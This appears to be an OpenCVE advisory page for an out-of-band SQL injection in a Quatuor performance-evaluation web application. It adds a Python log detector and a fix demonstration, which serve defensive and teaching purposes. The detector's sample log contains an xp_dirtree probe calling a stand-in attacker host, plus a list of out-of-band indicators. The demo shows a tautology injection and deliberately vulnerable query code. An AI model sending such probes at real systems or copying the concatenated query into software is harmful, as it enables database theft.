Description
An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_ver_auto.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.
Published: 2026-01-27
Score: 9.3 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Confidentiality compromise through out-of-band SQL injection
Action: Immediate Patch
AI Analysis

Impact

This vulnerability is an out-of-band SQL injection in the Id_usuario parameter of the /evaluacion_objetivos_anyo_sig_ver_auto.aspx endpoint, enumerated as CWE-89 (untrusted input reaching a database query without adequate neutralisation). In an out-of-band injection the attacker does not read query results from the HTTP response; instead the injected SQL makes the database server itself open an outbound connection (typically a DNS lookup or an HTTP request) to a host the attacker controls, with the query result embedded in that request, so the response the application returns can look entirely normal. The CVE description scopes the impact to the confidentiality of the stored data. Note, however, that the CVSS v4.0 vector supplied by the assigner (VC:H/VI:H/VA:L) also rates integrity impact as high, whereas NVD's CVSS v3.1 vector (C:H/I:N/A:N) rates confidentiality only.

Affected Systems

The flaw affects the Quatuor Evaluación de Desempeño (EDD) performance evaluation application, developed by Gabinete Técnico de Programación, in all releases prior to the fixed version published on November 12, 2025. The recorded CPE (cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*) carries no version bound, so affected deployments must be identified by release date rather than version number. No other vendors or products are listed as impacted.

Risk and Exploitability

The CVSS v4.0 score of 9.3 is Critical, while the EPSS score of < 1 % indicates a low but non-zero probability of exploitation in the wild. The vulnerability is not listed in the CISA KEV catalog, and the SSVC assessment records Exploitation: none and Automatable: yes. The vector (AV:N/AC:L/AT:N/PR:N/UI:N) describes an unauthenticated, network-reachable attack with no user interaction: the attacker sends a crafted Id_usuario value to the endpoint and relies on the database server (not the application server) being able to initiate outbound connections, for example DNS resolution or HTTP, to a host under their control; that connection is the channel that carries the data. Exploitation therefore requires only that the endpoint be reachable and that the database host have unfiltered egress.
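Because an out-of-band injection leaves nothing in the HTTP response, the evidence of an attempt against this endpoint is the request itself plus any unexpected DNS or HTTP connection from the database host. The following is an added example, written for this page and not code from OpenCVE, INCIBE or the vendor, that scans Common Log Format access-log lines for requests to /evaluacion_objetivos_anyo_sig_ver_auto.aspx whose Id_usuario value is not a plain numeric id and classifies them. The log lines are constructed, the list of out-of-band indicators is generic (the advisory does not say which database the product uses), and the assumption that a legitimate Id_usuario is numeric comes from the parameter's name, not from the page.

```python
"""Added example (not from the OpenCVE page or the vendor): flag suspicious
Id_usuario values sent to the affected endpoint in web server access logs."""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

ENDPOINT = "/evaluacion_objetivos_anyo_sig_ver_auto.aspx"
PARAM = "Id_usuario"  # ASP.NET query-string keys are case-insensitive; matched that way below

# Generic out-of-band indicators (SQL Server, Oracle, MySQL, PostgreSQL). None is
# specific to this product; which database it uses is not stated (assumption).
OOB_INDICATORS = [
    r"xp_dirtree", r"xp_fileexist", r"xp_cmdshell", r"sp_oacreate",
    r"utl_http", r"utl_inaddr", r"dbms_ldap", r"load_file",
    r"\\\\",                               # UNC path such as \\host\share
    r"copy\s+.*\s+to\s+program",
]
SQL_META = re.compile(r"['\";]|--|/\*|\bunion\b|\bselect\b|\bdeclare\b|\bexec\b", re.I)

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status size
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)


def extract_param(target, name=PARAM):
    """Decoded values of `name` (case-insensitive) in the request's query string.
    A second unquote catches double-encoded payloads; it is a no-op otherwise."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    vals = []
    for key, values in qs.items():
        if key.lower() == name.lower():
            vals.extend(unquote_plus(v) for v in values)
    return vals


def classify(value):
    """'benign' for a plain integer id, 'oob' if an out-of-band indicator is
    present, 'sqli' for SQL metacharacters, otherwise 'suspect'."""
    if value.isdigit():
        return "benign"
    low = value.lower()
    if any(re.search(p, low) for p in OOB_INDICATORS):
        return "oob"
    if SQL_META.search(value):
        return "sqli"
    return "suspect"


def scan(lines):
    """Return (ip, timestamp, verdict, value) for every request to ENDPOINT whose
    Id_usuario value is not a plain numeric id. Other paths are ignored."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        target = m.group("target")
        if urlsplit(target).path.lower() != ENDPOINT:
            continue
        for value in extract_param(target):
            verdict = classify(value)
            if verdict != "benign":
                hits.append((m.group("ip"), m.group("ts"), verdict, value))
    return hits


# Constructed sample log lines (not real traffic). The third line carries a
# generic SQL Server-style out-of-band probe purely so the detector has
# something to classify; it is not a payload reported for this CVE.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2026:09:12:01 +0000] "GET /evaluacion_objetivos_anyo_sig_ver_auto.aspx?Id_usuario=1042 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Feb/2026:09:12:09 +0000] "GET /evaluacion_objetivos_anyo_sig_ver_auto.aspx?Id_usuario=1042%27%20OR%201%3D1-- HTTP/1.1" 200 5123',
    '198.51.100.7 - - [10/Feb/2026:09:13:44 +0000] "GET /evaluacion_objetivos_anyo_sig_ver_auto.aspx?Id_usuario=1042%3Bexec%20master..xp_dirtree%20%27%5C%5Cattacker.example%5Cx%27-- HTTP/1.1" 200 5123',
    '198.51.100.7 - - [10/Feb/2026:09:14:02 +0000] "GET /otra.aspx?Id_usuario=1042%27 HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Pair the access-log hits with the database host's DNS and egress logs for the same minute: a request classified as oob that is followed by a lookup of an unfamiliar domain from the database server is the strongest signal this vulnerability offers, since the application's own response never shows the leak.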

Generated by OpenCVE AI on April 18, 2026 at 14:46 UTC.

Remediation

Vendor Solution

The vulnerabilities have been resolved in the latest version of the application, released on November 12, 2025, and are no longer exploitable.


OpenCVE Recommended Actions

  • Upgrade to the version of the application released on November 12 2025, which contains the fix.
  • Restrict outbound traffic from the database server, not only from the application server, since the out-of-band channel is opened by the database host: block DNS resolution and HTTP/SMB connections to arbitrary external hosts, and log and alert on attempts.
  • Use parameterized queries (bound parameters) for the Id_usuario parameter instead of building SQL by string concatenation, and additionally reject any value that is not a plain numeric identifier before it reaches the data layer, following best practices for preventing SQL injection (CWE-89).
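The last two actions above are the CWE-89 fix itself. As an added example that is not code from the page, from OpenCVE or from the vendor, the block below shows the vulnerable pattern (the Id_usuario value spliced into the SQL text) beside a parameterized lookup and a numeric-only validator, run against an in-memory SQLite table with constructed rows. The real application is ASP.NET (.aspx), so this is a Python stand-in: the table and column names are invented, and the crafted value is a generic tautology used only to show how the returned row count changes, not a payload taken from any report on this CVE.

```python
"""Added example, not from the OpenCVE page or from Quatuor / Gabinete Técnico de
Programación: a string-built lookup on a parameter like Id_usuario next to its
parameterized replacement. SQLite stands in for the product's (unstated) database."""
import re
import sqlite3


def setup_db():
    """Constructed sample data (assumption): three users' evaluation rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE evaluaciones (id_usuario INTEGER, objetivo TEXT, nota INTEGER)"
    )
    conn.executemany(
        "INSERT INTO evaluaciones VALUES (?, ?, ?)",
        [(1042, "Objetivo A", 8), (1043, "Objetivo B", 6), (1044, "Objetivo C", 9)],
    )
    return conn


def lookup_vulnerable(conn, id_usuario):
    """CWE-89: the request parameter becomes part of the SQL text, so any quote
    or operator inside it is parsed as SQL rather than as data."""
    sql = (
        "SELECT id_usuario, objetivo, nota FROM evaluaciones "
        "WHERE id_usuario = '%s'" % id_usuario
    )
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, id_usuario):
    """Fix: the value is bound to a placeholder and never concatenated into SQL.
    A crafted string is compared as a literal and simply matches nothing."""
    sql = "SELECT id_usuario, objetivo, nota FROM evaluaciones WHERE id_usuario = ?"
    return conn.execute(sql, (id_usuario,)).fetchall()


ID_RE = re.compile(r"^[0-9]{1,10}$")


def validate_id(raw):
    """Defense in depth: a user id is a decimal integer (assumption based on the
    parameter's name). Anything else is rejected before reaching the data layer."""
    if not ID_RE.match(raw):
        raise ValueError("Id_usuario must be a decimal integer")
    return int(raw)


def demo():
    """Row counts for a benign id and a generic tautology through both lookups."""
    conn = setup_db()
    benign = "1042"
    crafted = "1042' OR 1=1--"   # generic example input, not a payload from any report
    return {
        "vuln_benign": len(lookup_vulnerable(conn, benign)),      # 1 row
        "vuln_crafted": len(lookup_vulnerable(conn, crafted)),    # every row: WHERE is now 'OR 1=1'
        "param_benign": len(lookup_parameterized(conn, validate_id(benign))),  # 1 row
        "param_crafted": len(lookup_parameterized(conn, crafted)),  # 0 rows: compared as text
    }


if __name__ == "__main__":
    print(demo())
```

In ADO.NET the equivalent of the bound `?` is a SqlParameter added to SqlCommand.Parameters; the rule is the same in any stack: the value travels as data, never as part of the SQL string. The validator is not a substitute for binding (an allow-list of digits would not help a parameter that must carry free text) but it cheaply rejects the whole class of malformed input for a numeric key.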

Generated by OpenCVE AI on April 18, 2026 at 14:46 UTC.


Advisories

No advisories yet.

History

Tue, 10 Feb 2026 20:30:00 +0000

Type      Values Removed   Values Added
CPEs      -                cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*
Metrics   -                cvssV3_1 {'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}


Tue, 27 Jan 2026 20:30:00 +0000

Type                  Values Removed   Values Added
First Time appeared   -                Quatuor; Quatuor evaluacion De Desempeno
Vendors & Products    -                Quatuor; Quatuor evaluacion De Desempeno

Tue, 27 Jan 2026 19:15:00 +0000

Type      Values Removed   Values Added
Metrics   -                ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 27 Jan 2026 17:00:00 +0000

Type          Values Removed   Values Added
Description   -                An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_ver_auto.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.
Title         -                Out-of-band SQL injection in Quatuor Performance Evaluation
Weaknesses    -                CWE-89
References    -                -
Metrics       -                cvssV4_0 {'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: INCIBE

Updated: 2026-01-27T18:32:12.743Z

Reserved: 2026-01-27T09:25:57.860Z

Link: CVE-2026-1481

Vulnrichment

Updated: 2026-01-27T18:32:06.211Z

NVD

Status : Analyzed

Published: 2026-01-27T17:16:11.687

Modified: 2026-02-10T20:19:16.253

Link: CVE-2026-1481

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T15:00:03Z

Weaknesses